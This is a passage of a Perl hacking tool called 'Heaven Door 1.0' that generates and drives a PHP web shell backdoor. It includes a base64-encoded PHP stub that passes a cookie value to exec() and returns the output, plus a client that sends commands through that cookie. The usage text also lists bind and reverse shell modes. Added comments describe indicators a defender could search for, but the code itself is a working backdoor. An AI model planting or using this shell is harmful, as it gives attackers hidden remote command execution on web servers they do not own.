    my ($salida) = $text =~ /\[code\_heaven\](.*?)\[\/code\_heaven\]/s;
    return defined $salida ? $salida : "";
}
# Write the PHP stub to $filename. An existing file of that name is deleted
# first (savefile() appends, so this keeps the result to a single copy);
# success is judged only by the file existing afterwards.
sub cargar_generador_backdoor {
my $filename = shift;
if(-f $filename) {
unlink($filename);
}
printear_titulo("[+] Generating backdoor ...\n\n");
generar_backdoor($filename);
if(-f $filename) {
printear("[+] Backdoor $filename generated !\n");
} else {
printear("[-] Error generating backdoor\n");
}
}
# Decode the embedded stub and append it to $filename via savefile().
# $code is the base64 form of a short PHP snippet. Decoded, it does this:
# when the request carries a non-empty cookie named heaven_door_here, the
# cookie value is passed to exec() and the collected output is echoed,
# base64-encoded, between [code_heaven] and [/code_heaven].
#
# Defender notes: in a web root, look for a PHP file that feeds $_COOKIE
# into exec() and contains the strings heaven_door_here, [code_heaven] and
# [/code_heaven]; in transit the reply is base64, so the markers do not
# appear literally in response bodies.
sub generar_backdoor {
my $filename = shift;
my $code = "PD9waHAgaWYgKGlzc2V0KCRfQ09PS0lFWyJoZWF2ZW5fZG9vcl9oZXJlIl0pICYmICFlbXB0eSgkX0NPT0tJRVsiaGVhdmVuX2Rvb3JfaGVyZSJdKSkgeyAJJGNvZGUgPSAiIjsgCSRvdXRwdXQgPSAiIjsgCWV4ZWMoJF9DT09LSUVbImhlYXZlbl9kb29yX2hlcmUiXSwkY29kZSk7IAlmb3JlYWNoICgkY29kZSBhcyAkbGluZSkgeyAJCSRvdXRwdXQgPSAkb3V0cHV0IC4gJGxpbmUuIlxuIjsgCX0gCWVjaG8gYmFzZTY0X2VuY29kZSgiW2NvZGVfaGVhdmVuXSIuJG91dHB1dC4iWy9jb2RlX2hlYXZlbl0iKTsgfSA";
savefile($filename,decode_base64($code));
}
# Send one GET request to $url with $command placed verbatim in a Cookie
# header named heaven_door_here, and return the base64-decoded response
# body. Hostname and certificate verification are switched off; the timeout
# is 10 seconds.
#
# Defender notes: the cookie name and the fixed Firefox/25.0 User-Agent are
# stable strings to search for in web-server or proxy logs (the cookie only
# if cookie logging is enabled). The command is not encoded in the request;
# only the reply is base64.
sub cargar_comando {
my($url,$command) = @_;
my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
$nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
$nave->timeout(10);
my $contenido = $nave->get($url,Cookie => "heaven_door_here=".$command)->content;
return decode_base64($contenido);
}
# Append $text plus a newline to $filename.
# NOTE(review): this is a two-argument open on a bareword handle with the
# mode glued to the name, and neither open nor print nor close is checked,
# so a failed write goes unnoticed here.
sub savefile {
my ($filename,$text) = @_;
open( SAVE, ">>" . $filename );
print SAVE $text . "\n";
close SAVE;
}
# Print the text with Color::Output colour code 6, then switch back to 0.
sub printear {
    my ($texto) = @_;
    return cprint( join q{}, "\x036", $texto, "\x030" );
}
# Print the text with Color::Output colour code 7, then switch back to 0.
sub printear_logo {
    my ($texto) = @_;
    return cprint( join q{}, "\x037", $texto, "\x030" );
}
# Print the text with Color::Output colour code 10, then switch back to 0.
sub printear_titulo {
    my ($texto) = @_;
    return cprint( join q{}, "\x0310", $texto, "\x030" );
}
# Print the usage text, then the footer; copyright() ends the process, so
# this sub does not return to its caller.
# NOTE(review): the description printed for -reverse ("Get all tags GPS of
# a image") does not describe that mode; it looks carried over from the
# image script's usage text.
sub sintax {
printear("[+] Sintax : ");
print "perl $0 <option> <value>\n";
printear("\n[+] Options : \n\n");
print "-backdoor -port <port> : Enable backdoor in port\n";
print "-reverse -ip <ip> -port <port> : Get all tags GPS of a image\n";
print "-generate_backdoor -filename <filename> : Generate backdoor in filename\n";
print "-connect_backdoor -url <url> : Connect to backdoor in URL\n";
printear("\n[+] Example : ");
print "perl heaven_door.pl -reverse -ip 127.0.0.1 -port 666\n";
copyright();
}
# Print the program banner.
sub head {
    my $banner = "\n-- == Heaven Door 1.0 == --\n\n\n";
    printear_logo($banner);
}
# Print the footer and end the process. The exit status is 1 on every path,
# including a run that completed normally.
sub copyright {
    my $pie = "\n\n-- == (C) Doddy Hackman 2016 == --\n\n";
    printear_logo($pie);
    exit(1);
}
#The End ?